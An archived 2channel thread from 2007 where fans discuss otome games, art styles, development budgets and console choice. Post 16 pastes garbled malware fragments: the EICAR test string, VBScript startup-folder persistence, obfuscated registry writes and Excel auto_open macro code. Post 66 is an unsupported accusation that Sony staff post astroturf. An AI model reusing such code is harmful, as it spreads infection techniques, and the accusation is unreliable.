乙女ゲー総合雑談スレ Part8at GGIRL
乙女ゲー総合雑談スレ Part8 - 暇つぶし2ch2:名無しって呼んでいいか?
07/10/04 14:13:52
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3:名無しって呼んでいいか?
07/10/04 14:14:24
乙…乙女、B…BL、百…百合、原…コミックやアニメが原作、他…男女主人公対応or一般

[乙女・BLゲーム]
10/04(乙)幕末恋華・花柳剣士伝 (通常版・限定版)[PS2]
10/11 (乙)アラビアンズ・ロスト~The engagement on desert~ [PS2]
10/18(乙)パレドゥレーヌ [PS2]
10/18(乙)怪盗アプリコット ポータブル [PSP]
11/02(乙)KoiGIG~DEVILXANGEL~ [Win]
11/08(乙)星色のおくりもの[PS2]
11/29(B)咎狗の血 True Blood (通常版・Limited Edition)[PS2]
12/13(乙)はかれなはーと 君がために輝きを(通常版・限定版)[PS2]
12/25(乙)クローバーの国のアリス~ Wonderful Wonder World ~ [Win]
今冬(乙)放課後は白銀の調べ(通常版・限定版)[PS2]

08年1/31 (乙)ユア-Memo Off Girls-(通常版・限定版)[PS2]
08年1月 (乙)ラスト・エスコート2 ~深夜の甘い棘~[PS2]
08年2/14 (乙)プティフール(通常版・限定版)[PS2]

08年春(乙)DUEL LOVE~恋する乙女は勝利の女神~[DS]
08年夏(乙)断罪のマリア ~THE EXORCISM OF MARIA~ [Win]
08年(乙)Real Rode(通常版・限定版) [PS2]
08年(B)Daylight -朝に光の冠を- [Win]

未定(乙)フルハウスキス2 アペンドストーリー [Win]
未定(乙)乙女的恋革命★ラブレボ!! [Win]
未定(乙)乙女的恋革命★ラブレボ!! [DS]
未定(乙)VitaminX [DS]
未定(乙)戦場のプリンセス ~The princess on a battlefield~ [Win]
未定(乙)クリムゾン・エンパイア [Win]
未定(B)ピヨたん~お屋敷潜入☆大作戦~ [PS2]
↓↓↓以下 長いこと動きなし↓↓↓
未定(乙)夕日ヶ丘動物診療所 [Win]
未定(乙)怪盗アプリコット MixBox(仮) [Win]
未定(乙)Death&Angel ~最後の審判~ [PC]
未定(乙)バックラッシュ2(仮) [不明]
未定(B)トーラス・ZERO [Win]
未定(B)好きしょ4 [PS2]
未定(B)WIZ Diary PJ(仮) [Win]
未定(B)AFファンディスク [PC]
未定(B)Apocripha/0 PANDORA [不明] ※開発凍結?
未定(他)ほしがりエンプーサ [PS2]
未定(他)ほしがりエンプーサ [PSP]

[乙女orBL要素のある(と思われる)一般ゲーム]
秋(原)おおきく振りかぶって ホントのエースになれるかも [DS]
08年3/20(百)アオイシロ [PS2]
未定(他)大奥記 [PS2]

[廉価版]
10/4(乙)遙かなる時空の中で3 運命の迷宮(KOEI The Best)[PS2]
11/29(乙)SIMPLE2000シリーズ THE人魚姫物語~マーメイドプリズム~[PS2]

4:名無しって呼んでいいか?
07/10/04 15:12:07
電撃GS表紙の、メモオフタイトル変わってるね。
まあ、こっちの方が分かりやすくていいと思うけど

5:名無しって呼んでいいか?
07/10/04 15:13:46
>>1さん、おつです~

6:名無しって呼んでいいか?
07/10/04 15:37:00 meaN3+Tx
既出だけどメモオフ最終タイトル
ことごとく何かのパクリなんだな……
電撃Girl' Styleで初お目見えのGirl' StyleかYO!

7:名無しって呼んでいいか?
07/10/04 16:39:33
個人的にはただ絵だけが心配
他メーカーもIFの絵に関してだけは見習って欲しい
惹かれる部分があっても、絵や塗りでスルーすることばっかり。
キャラデザ本人の絵なんて、そこまで参考にならんし

8:名無しって呼んでいいか?
07/10/04 17:01:57
絵柄自体は悪くないけど塗りが…ってパターンが一番ガッカリする
塗りが綺麗なら多少絵が好みじゃなくても購買意欲を削がれたりしないんだが

9:名無しって呼んでいいか?
07/10/04 17:02:57
絵といえば最近配信始まった虹色の王子様、キャラデはコードギアスの作画監督の一人で
絵もアニメ塗りだけど綺麗でも好評だよ
好き好きのことは置いといて、アニメ塗りだろうとブラシ塗りだろうと
原画がよければクオリティは上がるよ。
よくアニメ塗りだから幻滅とか塗りが下手とかいうけど、それは元の原画もまずいんだよ。

10:名無しって呼んでいいか?
07/10/04 17:03:42
×絵もアニメ塗りだけど綺麗でも好評だよ
○アニメ塗りだけど綺麗で好評だよ

11:名無しって呼んでいいか?
07/10/04 17:10:22
アニメ塗りだからダメなんて意見、そこまで多いかな
今まで批判されたのって質自体が悪かったり、原画の絵柄とマッチしてないからとかじゃないのか

12:名無しって呼んでいいか?
07/10/04 17:17:29
あきらかに質が悪い:きら君(論外)
イラストとスチルの雰囲気が変わり過ぎる:水旋2
塗り以前の問題:ロゼ作品

OPからスチルから全てアニメっぽい(キワがぼけているからセル塗りではない)GSシリーズは
否定的な意見そんなに見ないな。
それでも「ケッ、アニメ塗り」的な意見はたまに見た。嫌いなだけだろう

13:名無しって呼んでいいか?
07/10/04 17:19:11
塗りって、人間で言えばメイクやファッションに通じるものがあると思うんだよね
同じ人(原画)でも、どういった装いにするかでずいぶんと印象が変わる。
そりゃ元から素材が綺麗でいて、なおかつファッションも洗練されるのがベストだろうけど
力入れるにこしたことはないのにな。

14:名無しって呼んでいいか?
07/10/04 17:22:51
BLだけどAGAKEは完全にアニメ塗りでも好評じゃね?

ロゼは塗りがどうこうより小中学生レベル……論外w

15:名無しって呼んでいいか?
07/10/04 17:26:30
GSはOPアニメがあるから
立ち絵やスチルがアニメ絵で違和感がない。

話ずれるけど、遙かはどうしてアニメ挿入するのかな…違和感ばりばり。
出来も悪くって笑いものにしかなんないのにorz

16:名無しって呼んでいいか?
07/10/04 17:33:22
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


17:名無しって呼んでいいか?
07/10/04 17:40:54
>>9
虹色の王子様は確かにスチルも背景も綺麗だけど
あれはそっちのプロが作ったものだしなぁ
それにテレビで見慣れちゃった絵柄だから
それが合わないって人も居るし

ゲームは絵と作品の雰囲気にあった塗りならいいよ


18:名無しって呼んでいいか?
07/10/04 18:04:11
絵柄がここまで購買意欲に直結してるあたりが
ゲームの進歩がない原因のような気もするが

19:名無しって呼んでいいか?
07/10/04 18:25:17
絵さえよければ後はどうでもいいっていうのと
絵にもっと力を入れて欲しいっていうのは全然違うでしょ
前者ばかりの意見で占められてるなら、その意見もまだ分かるけど
大多数のユーザーは、絵だけよくても仕方ないって思ってるんじゃないの?

20:名無しって呼んでいいか?
07/10/04 18:27:34
かけられるのは100なんだから
今よりもっと絵にっつったら今ある文から他の部分がマイナスされるのは普通なんじゃないの?
そら110や120目指して欲しいけど分配かえるだけでいいならソッチのが楽じゃん


21:名無しって呼んでいいか?
07/10/04 18:30:40
先に前スレを埋めろ

22:名無しって呼んでいいか?
07/10/04 18:49:28
>>20
日本語でおK

23:名無しって呼んでいいか?
07/10/04 18:55:28
最近読解力ないのを日本語でおkで済まそうとしてる人間増えたね

24:名無しって呼んでいいか?
07/10/04 19:03:55
>>22
>>20じゃないけど
仮に全体にかけられる労力を100として現状このくらいの比率とする

絵   60
その他 40

ユーザーの声に応えてもっと絵のレベルを上げようとすると

絵   80
その他 20
にならざるを得なくなるのでは、ということだと思う
>>21
なんか前スレと全然違う話してるから向こうに行きづらいんだが

25:名無しって呼んでいいか?
07/10/04 19:18:22
言いたいことは分かるけど
指摘と状況が噛み合ってないよ

26:名無しって呼んでいいか?
07/10/04 20:07:02
>>23
日本語でおk=話分かりにくいんだよ

と嫌味言ってる訳で
必ずしも理解力がないという訳でもないんじゃないか

27:名無しって呼んでいいか?
07/10/04 20:08:29
>>22
確かに一人の人が作ってるのなら100で計算されるだろうけど
絵に100
文に100
宣伝に100
ってのが仕事ってもんだ
金銭的な問題と技術的な問題は違うけど
今の乙女ゲーは宣伝ばかり頑張りすぎて
絵や文を70や60の平均点で押さえてるのが残念だな

28:名無しって呼んでいいか?
07/10/04 20:14:23
>>26
ちょっと考えて分かる程度なら流しとけって話だよ
一々嫌味言ってたら雰囲気悪くなるわ話ずれるわ結構迷惑なんだ

29:名無しって呼んでいいか?
07/10/04 20:15:29
絵が綺麗と言われている緋色だって絵師は社員で社内でやってんだから
特別そこに金かけてるってわけでもないだろうからね。

30:名無しって呼んでいいか?
07/10/04 20:17:09
>>18の絵柄部分が声優や萌えやらなら
分からんでもないけどね。
絵柄つーのは見当違いじゃない

31:27
07/10/04 20:17:21
アンカ間違ったwwww
>22 ×
>20 ○

32:名無しって呼んでいいか?
07/10/04 20:17:33
そう。だから100のうちどれだけかけてるかって考えが
そもそもおかしい
それ前提で話そうとしても無理あるからやめよう

33:名無しって呼んでいいか?
07/10/04 20:21:13
>>27
いや、全然違うだろ
トータルで考えないと

全部に均等に力入れてるわけないんだから
システム作るのだってどこに力入れるかで全然違うよ
資金と時間はかわりゃしないのに
結局どこにどれだけ金と時間を分配するかだよ

34:名無しって呼んでいいか?
07/10/04 20:23:16
>>27
一番売れた(?)GSは開発費<<<<宣伝費(主題歌含め)じゃない?
企業がそういう方向性に行くのも仕方ないのかも。

女はライトゲーマ多いし、流行りモノに流されやすい。
ゲーマな女ユーザーからすれば哀しい現実なのだが…

35:名無しって呼んでいいか?
07/10/04 20:27:26
>>34
そうでもない。
開発費を上回ってないよ

36:名無しって呼んでいいか?
07/10/04 20:28:17
>20,33
の言ってるのは、気合いってことでいいのかな?
企業として重視してるのが絵80で
あとはどうでもいいや、適当にやって~
と思ってるから、良い作品が出来ない

>27は仕事は分割でやっている以上
各部門100のデキを期待したいけど
技術的な事と金銭的な部分で絵や文が100のクオリティが出せてない
と言いたいんだと思うから

話がかち合わないんだと思う

37:名無しって呼んでいいか?
07/10/04 20:30:49
100で割り振るなら

シナリオ40絵40音楽20
(名作と言われるゲームは音楽の力も大きいから入れてみた)

それかゲーム性40絵40シナリオ20

こん位がいいな。声はいいや、いらない
でも今時声がないというのはDSの乙女ゲーじゃない限り
絶対叩かれるな……(DSでもあるのが今は普通だしな)

38:名無しって呼んでいいか?
07/10/04 20:31:20
新選組あたりは口コミで売れた感じだね

39:名無しって呼んでいいか?
07/10/04 20:32:39
そうなんだ…無知ですまん。

えーと…その…それは置いといて。
宣伝費の割合が多くなるのも、ユーザーの性質的に仕方ないんじゃないかな、
と言いたかったんだ。

40:名無しって呼んでいいか?
07/10/04 20:33:19
>>39>>34宛て。

41:名無しって呼んでいいか?
07/10/04 20:35:38
今の乙女ゲじゃ、絵よりシナリオの方が難しそうだな
絵みたいに、優秀な人材を別ジャンルから持ってきたとしても
必ずしもいい乙女ゲシナリオになるかどうかは分からないし

42:名無しって呼んでいいか?
07/10/04 20:38:23
金と時間をかけて結果でやすいのが宣伝やCGや声なんだろうさ

43:名無しって呼んでいいか?
07/10/04 20:51:07
ビジュアルや声優は発売前にチェックできるからな。
シナリオ面は、プレイしないことには設定の好き嫌いくらいしか判断できない。
ギャルゲみたいにライター買いもないし。
一応、メーカーやレーベルで選ぶ余地はあるんだけど、選択肢が狭いし。

44:名無しって呼んでいいか?
07/10/04 20:54:52
雑誌のSSや対鍵盤じゃ
テキストがどうかぐらいにしか参考にならないしね
このライターだから買わない…っていうのはあるんだけど

45:名無しって呼んでいいか?
07/10/04 20:57:08
コーエーとか商法がアレじゃなければ
エロゲで言うならアリスソフトみたいに
「コンスタントに良作を出す所」ってメーカー買いする人多そうなのに

まあそんな事しなくても今の商法で十分儲かってそうだからなあ

46:名無しって呼んでいいか?
07/10/04 21:10:07
ゲーム性とかは他メーカーより期待出来るけど
印象はIFと変わらないな

47:名無しって呼んでいいか?
07/10/04 21:16:23
どこまでを商法とするかによるなー。
攻略対象を誘い受け的に増やすとか
続編に合わせて前作を黒歴史っぽくしたりキャラ改変したりとか
そのへんも含めるなら、確かにそういう商法をやめれば
苗ユーザーやアンチ増産も無くなっていいだろうのにと思う。

48:名無しって呼んでいいか?
07/10/04 21:32:08
自分はゲームで終わらせてくれてるうちは我慢できるかな
FDも追加もゲームならいいけど
ドラマCD連発、コミック化、アニメ化は萎える

49:名無しって呼んでいいか?
07/10/04 21:48:13
メディア展開は商法とはちょっと違うでしょ
乙女ユーザーだけじゃなくて広い層に認知させる効果がある。
裾野を広げる意味では意欲を買いたい。

ネオロマは次々出すから、内容が伴っているかは別にして
業界の活性化にはなっているんじゃないかな。

50:名無しって呼んでいいか?
07/10/04 21:51:44
コルダ出たばかりだけども、コーエーの次ってなんだと思う?
そろそろアンジェにきてほしい

51:名無しって呼んでいいか?
07/10/04 21:53:09
年上が攻略対象の乙女ゲーしたい
なんかいいのありませんかね?

52:名無しって呼んでいいか?
07/10/04 21:53:35
認知させてるのなら商法になるのでは?
とか思っちゃった
どこまでが商法なのかは微妙だけど

メディア展開は確かに萎える
見なきゃいいだけだから、あーまたかって思うだけだけど

53:名無しって呼んでいいか?
07/10/04 22:07:08
>>51
年上オンリーとなるとちょっと難しいが
そうじゃないならどのゲームにも大概ひとり以上いる気がする。
詳しい好みや持ってるハードを書いて購入相談スレで聞いた方が早いと思う。

54:名無しって呼んでいいか?
07/10/04 22:15:26
フルキス1は一応全員年上だったけど
なんか全然そんな感じしないな…

55:名無しって呼んでいいか?
07/10/04 22:20:56
そういえばそうだなあという感じだな<フルキス

まあ年下よりは年上の攻略対象のが多いよな
学園ものだと年下2:同い年6:年上2
ファンタジーものだと年下2:同い年2:年上6
こんなイメージ

56:名無しって呼んでいいか?
07/10/04 22:32:48
どのぐらい年上が良いかにもよるよね

かなり個人的だけど、学園物だと
年下、同じ歳、先輩、年上
に分けたくなるw

57:名無しって呼んでいいか?
07/10/04 22:42:57
学園ものは先輩後輩の関係があるから年齢差って浮き彫りになるけど
ファンタジーだと1、2歳の差って無いも同然だったりするね。
トリップもの以外は主人公の年齢すら頭に入ってなかったりするw

58:名無しって呼んでいいか?
07/10/04 22:55:46
>>50
やっぱり一番売れる遥時じゃないの?
そろそろ4きそう。
キャラ一新キボン。

59:名無しって呼んでいいか?
07/10/04 23:39:02
>58
どっかでネオアンについてのアンケがあったって聞いたからネオアン関係鴨試練

60:名無しって呼んでいいか?
07/10/04 23:51:40
上で商法の話が出てたけど
勇者育てゲーって、執事カフェとコラボしたんだな

発売前からそんなに話題にもなってない気がしてたけど
お金のかける所を間違ってるよ

61:名無しって呼んでいいか?
07/10/04 23:54:55
うそなにそれ
エンプロはシナリオと絵師が同じ人で
そもそもお金かけてないのに。
システムも超もっさりで全く進歩がないってね。

62:名無しって呼んでいいか?
07/10/04 23:55:22
スレも発売して1週間なのに伸び少ないしね byスレ住人
そういや総合スレでもほとんど話題にならなかったな…

システムもっさりだけど結構楽しいよー

63:名無しって呼んでいいか?
07/10/05 00:11:52
進歩がないって、どこからの進歩?
ジェネックスからっていうんで、てっきりプリメ仕様だと思ったんだけど違うのかな……?

64:名無しって呼んでいいか?
07/10/05 00:20:52
多分ファンタ2のことかと

プリメ4のシステムを最初は流用してるかと思ったけど
体感的にプリメ4より微妙にもっさりしてるような
(プレイしたのは2年前だから同じ位かもしれないけど)

65:名無しって呼んでいいか?
07/10/05 00:50:04
>>59
ネオアンがきそうってマジっすか?
アンケートとかきたの?
あまり評判良くなかったみたいだけど、自分はネオアン好きなんで
楽しみに待ってみる

66:名無しって呼んでいいか?
07/10/05 00:57:13
緊急速報
卑劣なソニー社内からの2chゲームスレへの集団書き込み消費者心理だまし中傷工作発覚す!

ASHのネガキャンに必死な奴がいる

スレにASHのバグがあった画像貼られる

実はIP抜かれる画像

GateKeeperが引っかかる

突然スレ内でのASHのネガキャンが止まる

■ソフト売上を見守るスレッドvol.1868■
スレリンク(ghard板:96番)

証拠画像
URLリンク(www.uploda.org)

現在確認されているGKの皆様

gatekeeper1.scei.jp
GateKeeper18.Sony.CO.JP
GateKeeper10.Sony.CO.JP
GateKeeper19.Sony.CO.JP

67:名無しって呼んでいいか?
07/10/05 01:08:18
>>60
そういうイベントにいくらかかるのかは知らんがおそらく

イベント開催

各ゲームニュースサイトに取り上げられる

普通に広告出すよりは金がかからずウマー

ってことなんじゃまいかと推測

68:名無しって呼んでいいか?
07/10/05 01:30:40
変なところで知恵働かせるより、まともに制作して
ちゃんと発売予定に出せばよかったんだよ
せっかくビズログとかが発売までのバックアップをやってみたり
発売にむけて多少は盛り上がるべきところを延期延期で
1年以上延期して、雑誌の扱いもどんどん小さくなって
やっと出ても延期した意味が感じられないもっさりゲーム
延期ばっかりするから、D3のムスコゲーに対抗してシステム強化してるのかと
いらない期待をしたのにさ。

でも絵がビミョーすぎるから特攻しなかった。しなくてよかった。

69:名無しって呼んでいいか?
07/10/05 03:53:44
虹色の王子様って始めて知ったけど
これ移植してくれないかな
ドコモ使いじゃないからやれん

目新しくはないが、とにかく絵が良すぎる

70:名無しって呼んでいいか?
07/10/05 07:54:11
買ってもいないのに叩きまくってる人ってなんなんだろう?
自分は特攻して満足してるけどな
逆にムスコは特攻しなきゃよかったと思うくらい本編が合わなかった
プレイしないとわからないからしょうがないけどね

71:名無しって呼んでいいか?
07/10/05 08:08:46
>プレイしないとわからない
結局のところ、これが真理なんだよね。
叩かれまくっていても自分のツボにはハマるってゲームもあるし、逆もある。

72:名無しって呼んでいいか?
07/10/05 09:01:24
>69
絵もだけど、キャラもいいし
話も次ぎの配信が楽しみなくらいは、面白い
FOMAだけってのは勿体ないし
他携帯機で遊べるようになっても是非移植はして欲しいな

73:名無しって呼んでいいか?
07/10/05 13:29:20
評判いいから見てきたけど
これなら既存のアニメ系絵柄と変わらない気がした

74:名無しって呼んでいいか?
07/10/05 13:45:04
乙女ゲーで立ち絵からスチルまで、完全にアニメ絵って少ない気がする
ときメモと八犬くらいか?
アニメ絵大好きだから自分も移植してほしい

携帯ゲーって移植されるのって少ないイメージだけど
技術的に大変ってことはないだろうから、容量が少なすぎるとかかな

75:名無しって呼んでいいか?
07/10/05 13:54:15
マイネ2や旋律2もそうじゃない?

76:名無しって呼んでいいか?
07/10/05 14:00:06
携帯ゲー繋がりだけど、オレンジハニーもそうだよね
移植でキャラデザ変わったみたいだけど

77:名無しって呼んでいいか?
07/10/05 15:13:53
>>74
携帯ゲーだと適当な作りでも誤魔化せるだろうけど、
CSに移植となると、そうもいかないからじゃない?
容量は2の次だと思う

78:名無しって呼んでいいか?
07/10/05 16:50:45
乙女ゲーはこのまま携帯アプリに移行していきそうだな
元々家庭用でそんなにヒット見込めるジャンルじゃないし

79:名無しって呼んでいいか?
07/10/05 16:54:45
携帯アプリになるよりは、DSでもPSPでもいいから
コンシューマにとどまって欲しいな。

最近のモバイルは性能がいいと言っても、
携帯は携帯として使いたいし、機種によって仕様とか
さまざまだから使いづらい。

80:名無しって呼んでいいか?
07/10/05 17:01:54
据え置きから携帯機とか携帯に移行したら自分はさよならだなー
PCならついてくけど。

81:名無しって呼んでいいか?
07/10/05 17:17:14
自分は携帯というかPSPとかも好きじゃないからついてかない
なんでかっていうと、画面が小さいから
これに尽きる

82:名無しって呼んでいいか?
07/10/05 17:29:23
流石に携帯は無いんじゃないか?
声オタが釣れないwww

お金を払っている以上適当な作りで誤魔化せるとは思えないけど
コンシュマーより、リスクが少ないんじゃないかな
人気が出れば、ドラマCD化や移植も考えてるとは思うけどなぁ

83:名無しって呼んでいいか?
07/10/05 21:02:52
>>81
とは逆に携帯機は市場を拡げるから好印象を受けるなー
携帯アプリは連動じゃなければオケ。
PCで開発費かけない別バージョンを出すほうが悪印象
ラクしようと思うなって感じる

84:名無しって呼んでいいか?
07/10/05 21:03:32
>>80-81
だわ、スマソ

85:名無しって呼んでいいか?
07/10/05 22:17:17
画面小さいと萌えられない。
モバイルの乙女ゲーの移植なら携帯機への移植でも仕方ないけれど
新作とかある程度力のあるメーカーのタイトルは
やっぱり据え置きがいい。
全ての乙女ゲーが携帯機になったら困るわ。
かと言ってPCも嫌なんだよな。PS2でいいよ本当にもう。

86:名無しって呼んでいいか?
07/10/05 22:34:58
FFみたいに常に最新のゲームスペックで最新のビジュアルを見せる
使命wがあるゲームはまだしも
PS2が一番普及してるしスペックも乙女ゲーなら充分なんだよねー
叩いたり身体動かすんじゃなきゃWiiにする意味ないし。

87:名無しって呼んでいいか?
07/10/05 22:35:49
携帯機に、ね。
それはまずないよー大丈夫だよ
携帯は携帯なりのよさもあるから移植や派生はアリだと思うけど。

88:名無しって呼んでいいか?
07/10/05 23:22:14
>>86
>叩いたり身体動かすんじゃなきゃWiiにする意味ないし。

それはどうかなぁw


89:名無しって呼んでいいか?
07/10/05 23:24:33
んー、Wiiのフォーエバーブルーにはまっている者としては
Wiiのマッタリ片手プレイは、好きなんだけどな。

しばらくは、PS2のままでいいと思うけど、
今後、次世帯機へ移行するならWiiで出して欲しいな。

90:名無しって呼んでいいか?
07/10/05 23:31:41
Wiiは売り上げ下がりっぱなしだからねえ……

91:名無しって呼んでいいか?
07/10/05 23:45:28
>>90
そーすきぼん

92:名無しって呼んでいいか?
07/10/05 23:46:24
かといってプレステ3やXbox買う気にもなんないしなー
乙女ゲームやるならPS2で必要十分なんだよ!いやマジで
まあガールズサイドDSはよくできてると思ったけど

93:名無しって呼んでいいか?
07/10/05 23:48:19
牧場物語wiiはなかなか乙女ゲーとしてもよかったよ

94:名無しって呼んでいいか?
07/10/05 23:55:43
わざわざWiiを買いたくないのでずっとPS2で出してください><

95:名無しって呼んでいいか?
07/10/05 23:56:35
乙女ゲーだけだと高スペックはいらないからなー
wiiで十分だ。PS3は今崖っぷちだし
でもwiiってPS2よりはスペック上だよね、さすがに

96:名無しって呼んでいいか?
07/10/06 00:04:37
個々のハードで、得意・不得意があるから、
はっきりとは判定できないけど、一般的な性能なら、こんな感じ

PS3 ≧ XBOX360 >> Wii ≧ XBOX >> GC > PS2

97:名無しって呼んでいいか?
07/10/06 00:24:12
>>96
95だが㌧
PS2ってGCより下なのか…。グラフィック関連は若干強そうだけど
いずれにしろPS2からシフトするとすれば、やっぱ自分的にはWiiだな

98:名無しって呼んでいいか?
07/10/06 02:52:48
Wiiが次世代機で一番単価安いから、
もしハードごと買うことになるならWiiが一番助かるな。
PS3は乙女ゲーのためだけには買えない。

99:名無しって呼んでいいか?
07/10/06 04:24:55
90じゃないけど>>91

【急ストップ】Wii最低売上記録更新中★81
スレリンク(ghard板)l50

100:名無しって呼んでいいか?
07/10/06 05:42:59
問題は、もはや旧世代ハードであるPS2市場をいつまで使えるか、かもね。
まあ、レゲー板の超末期スレ見るとPSはPS2という次世代ハードが出た以降も
廉価版やアニバーサリー的な物が主とはいえ11年くらいソフトが出続けたみたいだけど。

101:名無しって呼んでいいか?
07/10/06 07:51:40
>>99
おいおい、そんな、ゲハでもアンチ任天堂派の
煽り屋が立てたり闊歩したりているスレがソースかよー。

確かに、夏商戦を過ぎてからは、販売台数が減っているけれど、
それは、過去のゲームハード機では当然の話で、
販売台数が減っているのは、Wiiだけではなく、
減った割合で行けば、PS3やXBOX360の方も同じように減っている。

週間ハード販売台数
URLリンク(www.geocities.jp)

過去最高の普及率の据え置き機のPS2の同時期も
発売されてから少したった夏商戦後から後の時期は減ってる。
実際、夏商戦が終了したら、年末商戦まで、ハードは売れないものなんだよ。
狂ったようなブームになってとんでもなく売れ続けたDSの例があるから
みんな感覚がおかしくなっているとけど。




102:名無しって呼んでいいか?
07/10/06 09:30:39
PS3希望派。
PS2が市場に出回らなくなってから壊れたら、PS2のソフトやるためにPS3買うから。

103:名無しって呼んでいいか?
07/10/06 10:09:28
携帯アプリで開発するのは据置コンシューマーより断然コスト安いから
スポンサー気にせず好きなものを作りやすい、とは弱小プロのライターさん談
予算ないけど気概のある会社にはそういうとこで冒険作作ってほしいな
携帯の乙女って甘い台詞並べた手抜きノベルゲーばっかに思えるけど
甘い台詞なら声つきで萌えたい人がほとんどだろうし、
携帯では台詞以外でのとこでの新らしい萌えを見つけたいなー
仕掛けで萌える、発想の勝利みたいな作品来ないかね
金がある会社ならDSでそういうのやるんだろうけど…

104:名無しって呼んでいいか?
07/10/06 10:16:50
PS3でも別にいいんだけど…
PS2の性能すら活かしきれてない乙女ゲー多いのを思うと微妙な気分になる。
PSかと思うような画質・音源だったりシステムがもっさりだったり。
まあPS3は現時点では現実的ではないだろうな、開発費が割に合わなさすぎる

PS2で発売してDSもしくはPSPに移植って流れがいいのかな。

105:名無しって呼んでいいか?
07/10/06 10:20:23
PS3のスペックをばりばり使うようなソフトだと
乙女ゲーとして最大に売れても開発費には到底追いつかないだろうし
こんなのPS2でいいじゃん?みたいなソフトなら
PS3でも動くPS2ソフトとして出せばよいだけだし
今PS3で出すメリットって何もないだろう
かと言ってWiiとかになると今出すとしたら
乙女ゲーしかやりませんみたいなユーザー相手には
ハードごと買わせるという高いハードルをクリアせんとならんわけで

PS2が普通に売ってる間はPS2で出しつづけると思う
その後は、結局その時点で一番普及してるハードに行くだろうな
乙女ゲーに向いてるとか向いてないとか言うけど
ハイスペックを必要としない乙女ゲーは別にどこにでも行けるんだし

106:名無しって呼んでいいか?
07/10/06 11:47:45
>>102
多分それ無理。
PS3のPS2の互換性の低さはかなり不評をかっている。

そして今後は、その酷い互換性すら、完全に切り捨てた
PS2に一切対応しないPS3を生産・販売していくことが
ヨーロッパで決定された。

日本向けPS3がどうなるかは分からないけれど、
多分そのうち、日本向けもそうなるだろうと予想されてる。

107:名無しって呼んでいいか?
07/10/06 11:52:18
PS3がPS2ソフトを切り捨てるって聞いてから
PS2ソフトの移行はPSPしかないのかなーとか考えたり…
PSP、テレビに繋いでやればいいのかな?それなら携帯はできるし場所もとらなくなっていいのかw



108:名無しって呼んでいいか?
07/10/06 11:54:03
>>106-107
それ、ほんと?

109:名無しって呼んでいいか?
07/10/06 11:59:01
>>108
↓ソース SCE公式 10/10から、欧州で発売されるとのこと。

URLリンク(www.scei.co.jp)
PS3既存ユーザーの利用状況や欧州での市場動向をふまえ、
新モデルからメモリーカードスロットなどの一部機能を取り外しました。
また、PS3用ソフトウェアのさらなる開発強化とラインアップの充実に伴い、
新モデルは「プレイステーション 2」専用ソフトウェアとの互換性を有しません。

>>107
以前、新型PSPだとゲーム出力できるって聞いて、買おうかと思ったら、
TVが、プログレッシブ対応じやなきゃだめとか、別売りケーブルがいるとか、
横幅が長いPSPに合わせて、上下左右に大きな黒枠ができるとか知って、あきらめた。

110:名無しって呼んでいいか?
07/10/06 12:01:08
超ハイスペックなグラフィック凄い綺麗な超高額な制作費の乙女ゲー出ればいいのに

111:名無しって呼んでいいか?
07/10/06 12:09:21
>>109
自分家のTVにD端子は付いてたから新型PSPなら使えるかもて思ってたけど
>横幅が長いPSPに合わせて、上下左右に大きな黒枠ができるとか知って、あきらめた。
これはチョト嫌だね…(´・ω・`)
現役のPS2、ここ最近起動時に怪音がするようになってきたし大事にしてやらねば…



112:名無しって呼んでいいか?
07/10/06 12:26:55
酷いなそれ・・・>PS2以下切捨て
PS、PS2で遊んできた名作をもう遊べなくなるのかと思ったら
ますますバカ高い3に買い替えするメリットなんか無い気がするな。
逆にソニーはそうしたユーザーを繋ぎとめておかずとも3は売れると思ってるんだろうか。
すげー思い上がり・・・。


113:名無しって呼んでいいか?
07/10/06 12:49:03
>>100の11年はPSソフトが出続けた期間だった。
PS2発売後のPSソフト販売期間は6年が正しい、ごめん。

しかし任天堂の携帯機もそうだけど、ハードに下位互換性を持たせる姿勢って
尊敬と好感を持ってたし、地味に勝ち組になる要因のひとつなんじゃと思ってるのに
…なんか家電発言以来のソニーに対する大きなガッカリ感が。

114:名無しって呼んでいいか?
07/10/06 13:10:02
PS2買ったときってPSもできるから
って理由が大きかったんだよな

PS2壊れたからPS3にするかな
って人も結構いるだろうにそれ切り捨てちゃ完全に損だな

115:名無しって呼んでいいか?
07/10/06 13:29:42
PSP!PsP!PSP!PSP!PSP!PSP!PSPPSPPSPいいいいいいいいい

116:名無しって呼んでいいか?
07/10/06 13:35:44
間違ってゲハ板来たかと思ったw
結構ハードを気にしている人多いんだね


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